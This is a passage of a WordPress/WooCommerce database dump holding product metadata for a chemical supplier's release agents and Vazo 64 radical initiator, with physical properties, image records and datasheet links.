INSERT INTO `wp_postmeta` VALUES (2700, 419, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (2701, 419, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 132px;" width="377">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="159">Thermoset Polysiloxane</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>White Emulsion</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>None</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>1.0 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>None</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (2702, 419, '317_default_editor', '12oz. Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (2703, 419, '318_custom_list_file', 'a:2:{s:32:"6642728049c00d0a35f2462b0a35186e";a:3:{s:4:"name";s:15:"ReleaSys 85 TDS";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-85-1.pdf";s:4:"desc";s:11:"ReleaSys 85";}s:32:"c1ff928022eb3699c2df09038620cb72";a:3:{s:4:"name";s:39:"ReleaSys Release Agent Product Overview";s:4:"file";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-aerosol.pdf";s:4:"desc";s:39:"ReleaSys Release Agent Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (2704, 419, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (2705, 419, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (2706, 419, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2707, 419, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2708, 419, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (2709, 419, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2710, 419, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (2711, 419, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (2712, 419, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (2713, 419, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (2714, 419, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (2715, 419, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2716, 419, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2717, 419, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2718, 419, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (2719, 419, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (2720, 419, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2721, 419, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (2722, 419, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2723, 419, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2724, 419, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (2725, 419, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2726, 419, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2727, 419, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (2728, 419, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2729, 419, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2730, 419, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (2731, 419, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (2732, 419, '_product_image_gallery', '1798'); 
INSERT INTO `wp_postmeta` VALUES (2733, 422, '_wp_attached_file', '2016/08/Vazo-radical-intiator.jpg'); 
INSERT INTO `wp_postmeta` VALUES (2734, 422, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5905;s:6:"height";i:5905;s:4:"file";s:33:"2016/08/Vazo-radical-intiator.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"Vazo-radical-intiator-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"Vazo-radical-intiator-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"Vazo-radical-intiator-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"Vazo-radical-intiator-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"Vazo-radical-intiator-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"Vazo-radical-intiator-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"Vazo-radical-intiator-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"Vazo-radical-intiator-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (2735, 423, '_edit_lock', '1496599413:3'); 
INSERT INTO `wp_postmeta` VALUES (2736, 423, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (2737, 421, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (2738, 424, '_wp_attached_file', '2016/08/Airplane-window-ReleaSys88.jpg'); 
INSERT INTO `wp_postmeta` VALUES (2739, 424, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3658;s:6:"height";i:2434;s:4:"file";s:38:"2016/08/Airplane-window-ReleaSys88.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"Airplane-window-ReleaSys88-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"Airplane-window-ReleaSys88-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"Airplane-window-ReleaSys88-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"Airplane-window-ReleaSys88-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"Airplane-window-ReleaSys88-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"Airplane-window-ReleaSys88-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"Airplane-window-ReleaSys88-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"Airplane-window-ReleaSys88-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (2740, 423, '_thumbnail_id', '424'); 
INSERT INTO `wp_postmeta` VALUES (2741, 423, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (2742, 423, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (2743, 423, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 84px;" width="378">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="159">Thermoset Polysiloxane</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>White Emulsion</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>None</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>1.0 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>None</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (2744, 423, '317_default_editor', '12oz Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (2745, 423, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (2746, 423, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (2747, 423, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2748, 423, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2749, 423, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (2750, 423, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2751, 423, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (2752, 423, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (2753, 423, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (2754, 423, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (2755, 423, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (2756, 423, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2757, 423, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2758, 423, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2759, 423, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (2760, 423, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (2761, 423, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2762, 423, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (2763, 423, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2764, 423, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2765, 423, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (2766, 423, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2767, 423, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2768, 423, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (2769, 423, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2770, 423, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2771, 423, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (2772, 423, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (2773, 423, '_product_image_gallery', '1799'); 
INSERT INTO `wp_postmeta` VALUES (2774, 423, '318_custom_list_file', 'a:2:{s:32:"a5b1ca51b4a6be03ce428348faf6d054";a:3:{s:4:"name";s:11:"ReleaSys 88";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-88-1.pdf";s:4:"desc";s:15:"ReleaSys 88-TDS";}s:32:"c1ff928022eb3699c2df09038620cb72";a:3:{s:4:"name";s:39:"ReleaSys Release Agent Product Overview";s:4:"file";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-aerosol.pdf";s:4:"desc";s:39:"ReleaSys Release Agent Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (2775, 425, '_edit_lock', '1496599224:3'); 
INSERT INTO `wp_postmeta` VALUES (2776, 425, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (2777, 426, '_wp_attached_file', '2016/08/ReleaSys89.jpg'); 
INSERT INTO `wp_postmeta` VALUES (2778, 426, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:22:"2016/08/ReleaSys89.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"ReleaSys89-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"ReleaSys89-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"ReleaSys89-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"ReleaSys89-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"ReleaSys89-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"ReleaSys89-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"ReleaSys89-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"ReleaSys89-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (2779, 425, '_thumbnail_id', '2650'); 
INSERT INTO `wp_postmeta` VALUES (2780, 425, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (2781, 425, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (2782, 425, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 132px;" width="345">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="159">Thermoset Polysiloxane</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>Clear</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>Alcohol</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>1.4 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>&gt;50 C</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (2783, 425, '317_default_editor', '12oz Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (2784, 425, '318_custom_list_file', 'a:2:{s:32:"e3fe985da7db79391f5c7518c2b1b219";a:3:{s:4:"name";s:11:"ReleaSys 89";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-89-1.pdf";s:4:"desc";s:15:"ReleaSys 89-TDS";}s:32:"c1ff928022eb3699c2df09038620cb72";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-aerosol.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (2785, 425, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (2786, 425, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (2787, 425, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2788, 425, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2789, 425, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (2790, 425, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2791, 425, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (2792, 425, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (2793, 425, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (2794, 425, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (2795, 425, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (2796, 425, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2797, 425, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2798, 425, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2799, 425, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (2800, 425, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (2801, 425, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2802, 425, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (2803, 425, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2804, 425, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2805, 425, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (2806, 425, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2807, 425, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2808, 425, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (2809, 425, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2810, 425, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2811, 425, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (2812, 425, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (2813, 425, '_product_image_gallery', '1781'); 
INSERT INTO `wp_postmeta` VALUES (2814, 425, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (2816, 427, '_edit_lock', '1496667953:3'); 
INSERT INTO `wp_postmeta` VALUES (2817, 427, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (2820, 402, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (2821, 429, '_wp_attached_file', '2016/08/VAZO-64-e1471532179572.jpg'); 
INSERT INTO `wp_postmeta` VALUES (2822, 429, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:452;s:6:"height";i:246;s:4:"file";s:34:"2016/08/VAZO-64-e1471532179572.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"VAZO-64-e1471532179572-340x246.jpg";s:5:"width";i:340;s:6:"height";i:246;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"VAZO-64-e1471532179572-250x246.jpg";s:5:"width";i:250;s:6:"height";i:246;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"VAZO-64-e1471532179572-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"VAZO-64-e1471532179572-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (2824, 427, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (2825, 427, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (2826, 427, '312_default_editor', '<p class="largeText">Miller-Stephenson offers four commercial grades: Vazo 52(G), 64(G), 67(G), and 88(G). The grade number is the Celsius temperature at which the half-life in solution is 10 hours. Vazo 64 has the following physical characteristics:</p>\r\n\r\n<ul>\r\n 	<li>Vazo 64: log (t1/2) = 7142 (1/T) - 18.355 (in toluene)</li>\r\n 	<li>First-order decomposition kinetics</li>\r\n 	<li>\r\n<div>Delivered in solid white "noodle" form</div></li>\r\n 	<li>\r\n<div>Soluble in a wide variety of solvents (aromatic hydrocarbons and other functional organic compounds)</div></li>\r\n 	<li>\r\n<div>Slightly soluble in aliphatic hydrocarbons</div></li>\r\n 	<li>\r\n<div>Insoluble in water</div></li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (2827, 427, '317_default_editor', '100g, 10 and 50 lbs fiber drum, 25kg Corrugated carton'); 
INSERT INTO `wp_postmeta` VALUES (2828, 427, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (2829, 427, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (2830, 427, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2831, 427, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2832, 427, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (2833, 427, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2834, 427, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (2835, 427, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (2836, 427, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (2837, 427, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (2838, 427, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (2839, 427, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2840, 427, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2841, 427, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2842, 427, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (2843, 427, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (2844, 427, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2845, 427, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (2846, 427, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2847, 427, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2848, 427, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (2849, 427, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2850, 427, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2851, 427, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (2852, 427, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2853, 427, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2854, 427, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (2855, 427, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (2856, 427, '_product_image_gallery', '1348'); 
INSERT INTO `wp_postmeta` VALUES (2857, 427, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (2858, 429, '_wp_attachment_backup_sizes', 'a:4:{s:9:"full-orig";a:3:{s:5:"width";i:452;s:6:"height";i:246;s:4:"file";s:11:"VAZO-64.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:19:"VAZO-64-340x246.jpg";s:5:"width";i:340;s:6:"height";i:246;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:19:"VAZO-64-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:19:"VAZO-64-300x246.jpg";s:5:"width";i:300;s:6:"height";i:246;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (2859, 302, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 87px;" width="377">\r\n<tbody>\r\n<tr>\r\n<td width="123">Primary Polymer:</td>\r\n<td width="211">Fluoropolymer</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Appearance:</td>\r\n<td width="211">White particle suspension</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Odor:</td>\r\n<td width="211">Slight</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Specific Gravity:</td>\r\n<td width="211">1.41 g/mL @ 25°C</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (2860, 302, '317_default_editor', '12 oz Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (2861, 302, '318_custom_list_file', 'a:1:{s:32:"cb316e19a5d50792b64377be0adb5880";a:3:{s:4:"name";s:9:"MS-122 SE";s:4:"file";s:70:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/122SE.pdf";s:4:"desc";s:12:"MS-122SE TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (2862, 302, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2863, 302, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2864, 302, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (2865, 302, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (2866, 302, '_ywtm_content_tab_description', '<strong>Physical Properties:</strong>\r\n\r\nPrimary Polymer:….. Fluoropolymer\r\nAppearance:………...White Particle suspension\r\nOdor:…………………Slight\r\nSpecific Gravity:……1.41 g/mL @ 25°C\r\n\r\n<strong>Release Agent Applications:</strong>\r\n\r\nMS-122SE can be used to release the following materials:\r\n<table style="height: 147px;" width="382">\r\n<tbody>\r\n<tr>\r\n<td width="140">•          Plastics</td>\r\n<td width="168">•          Rubbers</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Resins</td>\r\n<td width="168">•          Phenolics</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Acrylics</td>\r\n<td width="168">•          Polycarbonates</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Urethanes</td>\r\n<td width="168">•          Polystyrene</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Nylons</td>\r\n<td width="168">•          